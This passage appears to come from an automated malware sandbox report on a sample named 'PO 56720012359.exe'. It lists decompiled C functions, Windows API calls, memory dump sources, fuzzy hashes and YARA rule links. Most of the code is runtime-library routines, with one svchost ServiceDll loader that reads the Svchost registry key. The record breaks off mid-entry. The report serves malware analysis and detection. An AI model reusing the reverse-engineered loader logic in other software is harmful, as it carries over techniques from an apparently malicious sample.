                            • lstrlenW.KERNEL32(008C2048), ref: 008B11B1
                            • lstrlenW.KERNEL32(00000000), ref: 008B11BD
                            • lstrlenW.KERNEL32(008C204C), ref: 008B11CA
                            • lstrlenW.KERNEL32(Parameters), ref: 008B11D7
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B11EC
                            • HeapAlloc.KERNEL32(00000000), ref: 008B11F3
                            • lstrcpyW.KERNEL32 ref: 008B1205
                            • lstrcatW.KERNEL32(00000000,008C2068), ref: 008B1214
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 008B1222
                            • lstrcatW.KERNEL32(00000000,008C206C), ref: 008B1231
                            • lstrcatW.KERNEL32(00000000,Parameters), ref: 008B1240
                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 008B1267
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B12AE
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1400
                            • HeapFree.KERNEL32(00000000), ref: 008B1407
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1413
                            • HeapFree.KERNEL32(00000000), ref: 008B141A
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1426
                            • HeapFree.KERNEL32(00000000), ref: 008B142D
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1439
                            • HeapFree.KERNEL32(00000000), ref: 008B1440
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
                            • String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
                            • API String ID: 922840199-2032176762
                            • Opcode ID: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction ID: 546e82ee9e0dd8c2eb5b87843333ba4a74397b89cb68e9d7899910110b0f6c77
                            • Opcode Fuzzy Hash: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction Fuzzy Hash: 5D91D575900608FFDB04EBE4D859BAEBBB4FB48701F108619E611AA390E7799942CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B15A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 43%
                            			E008B15A0(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t19;
				long _t22;

				_v16 = 0;
				_v12 = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
				_v8 = _t19;
				if(_v8 == 0) {
					_v12 = E008B1000(_v16, _a4);
					_t22 = RegCloseKey(_v16);
					if(_v12 != 0) {
						_v8 = E008B1450(_v12);
						if(_v8 == 0) {
							HeapFree(GetProcessHeap(), 0, _v12);
						}
						return _v8;
					}
					0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
					0x8b0000(_a4, _t22);
					0x8b0000("cannot find registry value %s in %s\n", _t22);
					return 0;
				}
				0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
				0x8b0000("cannot open key %s, err=%d\n", _t19);
				return 0;
			}








                            0x008b15a6
                            0x008b15ad
                            0x008b15c9
                            0x008b15cf
                            0x008b15d6
                            0x008b1602
                            0x008b1609
                            0x008b1613
                            0x008b1641
                            0x008b1648
                            0x008b1657
                            0x008b1657
                            0x00000000
                            0x008b165d
                            0x008b161a
                            0x008b1624
                            0x008b162f
                            0x00000000
                            0x008b1634
                            0x008b15e1
                            0x008b15ec
                            0x00000000

                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B1609
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseOpen
                            • String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
                            • API String ID: 47109696-3561747105
                            • Opcode ID: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction ID: 56a1e3bfe9471b6b6cbd39db1b112954e74d6aeb04a3b6ac16928930317e271f
                            • Opcode Fuzzy Hash: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction Fuzzy Hash: CD11F97494020CFFDB04FBA8C85AFDEB778FB44701F208158B615EA391EA74AA419B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B2E1E, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E008B2E1E(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E008B2FCD(_t3);
				if(E008B4268() != 0) {
					_t6 = E008B3D79(E008B2BAF);
					 *0x8c21a8 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E008B42EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E008B2E94();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E008B3DD5( *0x8c21a8, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E008B2D6B(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E008B2E94();
					return 0;
				}
			}








                            0x008b2e1e
                            0x008b2e2a
                            0x008b2e39
                            0x008b2e3e
                            0x008b2e44
                            0x008b2e47
                            0x00000000
                            0x008b2e49
                            0x008b2e56
                            0x008b2e5a
                            0x008b2e5c
                            0x008b2e8b
                            0x008b2e8b
                            0x008b2e90
                            0x008b2e93
                            0x008b2e5e
                            0x008b2e6c
                            0x008b2e6e
                            0x00000000
                            0x008b2e70
                            0x008b2e70
                            0x008b2e72
                            0x008b2e73
                            0x008b2e7a
                            0x008b2e80
                            0x008b2e84
                            0x008b2e88
                            0x008b2e8a
                            0x008b2e8a
                            0x008b2e6e
                            0x008b2e5c
                            0x008b2e2c
                            0x008b2e2c
                            0x008b2e2c
                            0x008b2e33
                            0x008b2e33

                            APIs
                            • __init_pointers.LIBCMT ref: 008B2E1E
                              • Part of subcall function 008B2FCD: RtlEncodePointer.NTDLL(00000000,?,008B2E23,008B28F2,008C10E8,00000014), ref: 008B2FD0
                              • Part of subcall function 008B2FCD: __initp_misc_winsig.LIBCMT ref: 008B2FEB
                              • Part of subcall function 008B2FCD: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B3E6C
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B3E80
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B3E93
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B3EA6
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B3EB9
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B3ECC
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B3EDF
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B3EF2
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B3F05
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B3F18
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B3F2B
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B3F3E
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B3F51
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B3F64
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B3F77
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B3F8A
                            • __mtinitlocks.LIBCMT ref: 008B2E23
                            • __mtterm.LIBCMT ref: 008B2E2C
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B4182
                              • Part of subcall function 008B2E94: _free.LIBCMT ref: 008B4189
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(008C21F8,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B41AB
                            • __calloc_crt.LIBCMT ref: 008B2E51
                            • __initptd.LIBCMT ref: 008B2E73
                            • GetCurrentThreadId.KERNEL32 ref: 008B2E7A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction ID: 09fe444c1aebb2a8687c7674bbef77b9404be5afba650a76ccdb69acaa45b875
                            • Opcode Fuzzy Hash: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction Fuzzy Hash: 45F06D3251961269E23876B97C036CB3B90FF01731B25066AF4A0D93D7EE20D8428162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B1000, Relevance: 9.1, APIs: 6, Instructions: 66memoryregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B1000(void* _a4, short* _a8) {
				void* _v8;
				long _v12;
				unsigned int _v16;
				int _v20;
				int _v24;

				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
				if(_v12 == 0) {
					_v16 = _v20 + 4;
					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
					if(_v12 == 0) {
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
						return _v8;
					}
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0;
				}
				return 0;
			}








                            0x008b1020
                            0x008b1027
                            0x008b1033
                            0x008b1049
                            0x008b1068
                            0x008b106f
                            0x008b1092
                            0x008b10a1
                            0x00000000
                            0x008b10a6
                            0x008b107e
                            0x00000000
                            0x008b1084
                            0x00000000

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008B101A
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B103C
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1043
                            • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 008B1062
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1077
                            • HeapFree.KERNEL32(00000000), ref: 008B107E
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$ProcessQueryValue$AllocFree
                            • String ID:
                            • API String ID: 1095795037-0
                            • Opcode ID: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction ID: c82e3efd7b83f8e584ea1e2c8a59bc8ad1aacf441dc26026e660beaa5907b78e
                            • Opcode Fuzzy Hash: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction Fuzzy Hash: 0B21EA75A14608FFDB04EFE8D959FAEB7B8FF48300F108559E606DB290D6309A46CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B2EB1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E008B2EB1(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                            0x008b2eb5
                            0x008b2ec0
                            0x008b2ec8
                            0x008b2ed2
                            0x008b2eda
                            0x00000000
                            0x008b2edf
                            0x008b2eda
                            0x008b2ee4

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008B2EF0,00000000,?,008B6374,000000FF,0000001E,00000000,00000000,00000000,?,008B434C), ref: 008B2EC0
                            • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 008B2ED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 1646373207-1276376045
                            • Opcode ID: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction ID: 17c6bd8c73dd649e14282f36a3475105b85eb038516799d2c43be7428d088892
                            • Opcode Fuzzy Hash: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction Fuzzy Hash: 7CD01231240308BBDF50ABA2DC05FAE7BACFB04741F000165BD18D4351FA61DE519661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B853A, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B853A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E008B473F( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E008B847C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E008B5065(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                            0x008b8542
                            0x008b8547
                            0x008b8561
                            0x00000000
                            0x008b8561
                            0x008b8549
                            0x008b854e
                            0x00000000
                            0x00000000
                            0x008b8553
                            0x008b8570
                            0x008b8575
                            0x008b8578
                            0x008b857f
                            0x008b859e
                            0x008b85a5
                            0x008b85a7
                            0x008b85eb
                            0x008b85fa
                            0x008b8608
                            0x008b860a
                            0x008b861a
                            0x008b861a
                            0x008b861e
                            0x008b8620
                            0x008b8623
                            0x008b8623
                            0x008b8623
                            0x008b8623
                            0x00000000
                            0x008b8629
                            0x008b860c
                            0x008b860c
                            0x008b8611
                            0x008b8611
                            0x008b8614
                            0x00000000
                            0x008b8614
                            0x008b85a9
                            0x008b85ac
                            0x008b85b0
                            0x008b85d9
                            0x008b85d9
                            0x008b85dc
                            0x008b85dc
                            0x00000000
                            0x00000000
                            0x008b85de
                            0x008b85e2
                            0x00000000
                            0x00000000
                            0x008b85e4
                            0x008b85e4
                            0x00000000
                            0x008b85e4
                            0x008b85b2
                            0x008b85b5
                            0x00000000
                            0x00000000
                            0x008b85b9
                            0x008b85cc
                            0x008b85d2
                            0x008b85d5
                            0x008b85d7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x008b85d7
                            0x008b8581
                            0x008b8584
                            0x008b8586
                            0x008b858b
                            0x008b858b
                            0x008b8590
                            0x00000000
                            0x008b8590
                            0x008b8555
                            0x008b855a
                            0x008b855e
                            0x008b855e
                            0x00000000

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B8570
                            • __isleadbyte_l.LIBCMT ref: 008B859E
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B85CC
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B8602
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction ID: 0a565f81a7d384f021c554f9ac702528e0ac5936fcd48a0797760e4dba859378
                            • Opcode Fuzzy Hash: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction Fuzzy Hash: D4318D3160024AEFDB319F69C849BEB7BA9FF41311F154529E865C72A1EB30D891DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B63D9, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E008B63D9(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x8c329c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x8c40d0 - _t7;
								if(__eflags == 0) {
									_t9 = E008B5065(__eflags);
									 *_t9 = E008B5078(GetLastError());
									goto L17;
								} else {
									__eflags = E008B5360(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E008B5065(__eflags);
										 *_t12 = E008B5078(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E008B5360(_t6, _t31);
						 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
						goto L12;
					} else {
						E008B42B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E008B6347(__ebx, __edx, __edi, _a8);
				}
			}









                            0x008b63e0
                            0x008b63ee
                            0x008b63f1
                            0x008b63f3
                            0x008b6402
                            0x008b6435
                            0x008b6435
                            0x008b6438
                            0x00000000
                            0x00000000
                            0x008b6405
                            0x008b6407
                            0x008b6409
                            0x008b6409
                            0x008b6409
                            0x008b6416
                            0x008b641c
                            0x008b641e
                            0x008b6420
                            0x008b6480
                            0x008b6480
                            0x008b6422
                            0x008b6422
                            0x008b6428
                            0x008b646a
                            0x008b647e
                            0x00000000
                            0x008b642a
                            0x008b6431
                            0x008b6433
                            0x008b6452
                            0x008b6466
                            0x008b644c
                            0x008b644c
                            0x008b644c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x008b6433
                            0x008b6428
                            0x00000000
                            0x008b644e
                            0x008b643b
                            0x008b6446
                            0x00000000
                            0x008b63f5
                            0x008b63f8
                            0x008b63fe
                            0x008b63fe
                            0x008b644f
                            0x008b6451
                            0x008b63e2
                            0x008b63ec
                            0x008b63ec

                            APIs
                            • _free.LIBCMT ref: 008B63F8
                              • Part of subcall function 008B6347: __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B6347: __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B6347: RtlAllocateHeap.NTDLL(010E0000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction ID: 5ed14fd9dd8a0b4bc5c1a59fdb5e1a04899b06c7bdf25c33e0311d1cce1d102a
                            • Opcode Fuzzy Hash: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction Fuzzy Hash: 4311AC31504E15ABCB213F78AC457DA37D4FF04764F144529F909D6351FF39C861869A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B9DAD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B9DAD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E008BA2FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E008B9E33(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E008BA579(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E008BA4B8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                            0x008b9db0
                            0x008b9db6
                            0x008b9e29
                            0x00000000
                            0x008b9dbd
                            0x008b9dbd
                            0x008b9dc0
                            0x008b9ddb
                            0x008b9dde
                            0x008b9dfe
                            0x008b9e10
                            0x008b9de0
                            0x008b9de0
                            0x008b9de3
                            0x00000000
                            0x008b9de5
                            0x008b9df7
                            0x008b9df7
                            0x008b9de3
                            0x008b9e2e
                            0x008b9e32
                            0x008b9dc2
                            0x008b9dda
                            0x008b9dda
                            0x008b9dc0

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: d2fc2d763adaaa50faf8328ef8561807945ae7850971290da7cdaaacfb6c84bf
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 8501493604414EBBCF169E88CC42CEE3F26FB18354B588519FB5899231D377C9B1AB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: PO 56720012359.exe PID: 1392 Parent PID: 2600 PO 56720012359.exeCOMMON

                            Executed Functions

                            Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                            Strings
                            Memory Dump Source
